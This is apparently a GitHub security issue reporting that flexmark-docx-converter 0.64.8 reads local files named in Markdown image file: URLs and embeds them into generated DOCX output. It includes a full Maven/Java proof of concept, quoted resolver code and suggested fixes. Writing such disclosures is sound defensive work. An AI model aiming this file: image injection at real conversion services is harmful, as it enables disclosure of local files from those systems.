Skip to content

Local file inclusion via file: image references in DOCX rendering #678

Description

@Str1ckl4nd

Describe the bug

flexmark-docx-converter resolves Markdown image URLs and embeds the referenced image content into the generated DOCX. A file: URL supplied in attacker-controlled Markdown is treated as a valid image source and is read from the local filesystem by the default content resolver.

This means an application that converts untrusted Markdown to DOCX can be made to read a local file from the conversion environment and embed it into the generated .docx.

Affected component:

  • flexmark-docx-converter
  • DocxRenderer
  • Markdown image rendering

Affected version:

  • Tested against com.vladsch.flexmark:flexmark-docx-converter:0.64.8

To Reproduce

The following is a complete Maven reproducer. It creates a local proof PNG, references that local file from Markdown using a file: URL, renders the Markdown to DOCX, then opens the generated DOCX as a ZIP archive and verifies that the proof image was embedded under word/media/.

The PoC intentionally uses a locally generated proof image instead of reading any sensitive system file.

mkdir flexmark-docx-file-image-poc
cd flexmark-docx-file-image-poc
mkdir -p src/main/java

cat > pom.xml <<'EOF'
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <groupId>poc</groupId>
  <artifactId>flexmark-docx-file-image-poc</artifactId>
  <version>1.0-SNAPSHOT</version>

  <properties>
    <maven.compiler.source>11</maven.compiler.source>
    <maven.compiler.target>11</maven.compiler.target>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
  </properties>

  <dependencies>
    <dependency>
      <groupId>com.vladsch.flexmark</groupId>
      <artifactId>flexmark</artifactId>
      <version>0.64.8</version>
    </dependency>
    <dependency>
      <groupId>com.vladsch.flexmark</groupId>
      <artifactId>flexmark-docx-converter</artifactId>
      <version>0.64.8</version>
    </dependency>
  </dependencies>

  <build>
    <plugins>
      <plugin>
        <groupId>org.codehaus.mojo</groupId>
        <artifactId>exec-maven-plugin</artifactId>
        <version>3.3.0</version>
        <configuration>
          <mainClass>Repro</mainClass>
        </configuration>
      </plugin>
    </plugins>
  </build>
</project>
EOF

cat > src/main/java/Repro.java <<'EOF'
import com.vladsch.flexmark.docx.converter.DocxRenderer;
import com.vladsch.flexmark.parser.Parser;
import com.vladsch.flexmark.util.ast.Node;
import com.vladsch.flexmark.util.data.MutableDataSet;
import org.docx4j.Docx4J;
import org.docx4j.openpackaging.packages.WordprocessingMLPackage;

import javax.imageio.ImageIO;
import java.awt.Color;
import java.awt.image.BufferedImage;
import java.io.File;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;

public class Repro {
    public static void main(String[] args) throws Exception {
        Files.createDirectories(Path.of("target", "local-proof"));
        Path proofImage = Path.of("target", "local-proof", "flexmark-local-proof.png").toAbsolutePath();
        writeProofImage(proofImage);

        String fileUri = toFlexmarkFileUri(proofImage);
        String markdown = "![attacker controlled local image](" + fileUri + ")\n";

        MutableDataSet options = new MutableDataSet();
        Parser parser = Parser.builder(options).build();
        DocxRenderer renderer = DocxRenderer.builder(options).build();

        Node document = parser.parse(markdown);
        WordprocessingMLPackage template = DocxRenderer.getDefaultTemplate();
        renderer.render(document, template);

        File output = Path.of("target", "flexmark-docx-file-image-poc.docx").toFile();
        template.save(output, Docx4J.FLAG_SAVE_ZIP_FILE);

        if (!docxContainsProofImage(output)) {
            throw new IllegalStateException("The generated DOCX did not contain the local proof image");
        }

        System.out.println("Markdown input:");
        System.out.println(markdown);
        System.out.println("Generated DOCX: " + output.getAbsolutePath());
        System.out.println("FLEXMARK_DOCX_LOCAL_FILE_INCLUSION_CONFIRMED");
    }

    private static String toFlexmarkFileUri(Path path) {
        String normalized = path.toAbsolutePath().toString().replace(File.separatorChar, '/');
        if (!normalized.startsWith("/")) {
            normalized = "/" + normalized;
        }
        return "file:" + normalized;
    }

    private static void writeProofImage(Path path) throws Exception {
        BufferedImage img = new BufferedImage(8, 8, BufferedImage.TYPE_INT_RGB);
        for (int y = 0; y < 8; y++) {
            for (int x = 0; x < 8; x++) {
                int color;
                if (x < 4 && y < 4) {
                    color = Color.RED.getRGB();
                } else if (x >= 4 && y < 4) {
                    color = Color.GREEN.getRGB();
                } else if (x < 4) {
                    color = Color.BLUE.getRGB();
                } else {
                    color = Color.YELLOW.getRGB();
                }
                img.setRGB(x, y, color);
            }
        }
        ImageIO.write(img, "png", path.toFile());
    }

    private static boolean docxContainsProofImage(File docx) throws Exception {
        try (ZipFile zip = new ZipFile(docx)) {
            return zip.stream()
                    .filter(entry -> entry.getName().startsWith("word/media/"))
                    .anyMatch(entry -> imageEntryMatches(zip, entry));
        }
    }

    private static boolean imageEntryMatches(ZipFile zip, ZipEntry entry) {
        try (InputStream input = zip.getInputStream(entry)) {
            BufferedImage img = ImageIO.read(input);
            if (img == null || img.getWidth() != 8 || img.getHeight() != 8) {
                return false;
            }
            return sameRgb(img.getRGB(1, 1), Color.RED)
                    && sameRgb(img.getRGB(6, 1), Color.GREEN)
                    && sameRgb(img.getRGB(1, 6), Color.BLUE)
                    && sameRgb(img.getRGB(6, 6), Color.YELLOW);
        } catch (Exception e) {
            return false;
        }
    }

    private static boolean sameRgb(int actual, Color expected) {
        return (actual & 0x00ffffff) == (expected.getRGB() & 0x00ffffff);
    }
}
EOF

mvn -q compile exec:java

Resulting Output

The reproducer prints the attacker-controlled Markdown input and confirms that the local proof image was embedded into the generated DOCX:

Markdown input:
![attacker controlled local image](file:/.../target/local-proof/flexmark-local-proof.png)

Generated DOCX: .../target/flexmark-docx-file-image-poc.docx
FLEXMARK_DOCX_LOCAL_FILE_INCLUSION_CONFIRMED

The generated DOCX contains the local proof image under word/media/. The reproducer verifies this by reading image entries from the DOCX ZIP archive and checking the expected pixel pattern.

Root cause

The default DocxLinkResolver treats image links as valid local content. With default options, if DOC_RELATIVE_URL and DOC_ROOT_URL are empty, it returns the original URL as LinkStatus.VALID:

if (docRelativeURL.isEmpty() && docRootURL.isEmpty()) {
    return link.withStatus(LinkStatus.VALID)
            .withUrl(url);
}

When root or relative URL options are configured, file:/ URLs are also explicitly accepted:

} else if (url.startsWith("file:/")) {
    return link.withStatus(LinkStatus.VALID)
            .withUrl(url);
}

The default FileUriContentResolver then reads valid file:/ URLs from the local filesystem:

if (resolvedLink.getStatus() == LinkStatus.VALID) {
    String url = resolvedLink.getUrl();
    if (url.startsWith("file:/")) {
        File includedFile = new File(substring);
        if (includedFile.isFile() && includedFile.exists()) {
            return content.withContent(FileUtil.getFileContentBytesWithExceptions(includedFile))
                    .withStatus(LinkStatus.VALID);
        }
    }
}

Finally, image rendering loads those bytes and embeds the image into the DOCX:

ResolvedContent resolvedContent = docx.resolvedContent(resolvedLink);
if (resolvedContent.getStatus() == LinkStatus.VALID) {
    image = ImageUtils.loadImageFromContent(resolvedContent.getContent(), resolvedLink.getUrl());
}
...
return newImage(docx, image, filenameHint, attributes, id1, id2, scale);

Expected behavior

file: URLs from Markdown image input should not be read and embedded by default when converting untrusted Markdown to DOCX.

Possible safe behaviors:

  • reject file: image URLs by default
  • require an explicit opt-in option for local file embedding
  • restrict local image reads to a configured safe base directory
  • reject absolute paths and path traversal outside the configured document root

Impact

If a server-side or automated workflow converts attacker-controlled Markdown to DOCX, an attacker can cause the conversion process to read local image files and embed them into the resulting document.

The PoC uses a generated PNG for safety, but the same path reads any local file that ImageIO accepts as an image and that the conversion process can access. This may disclose local files from the conversion environment through the generated .docx.

Related issue

This is separate from #676. That issue concerns XXE in XML parsing helpers; this issue concerns Markdown image URL resolution and local file reads during DOCX image rendering.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions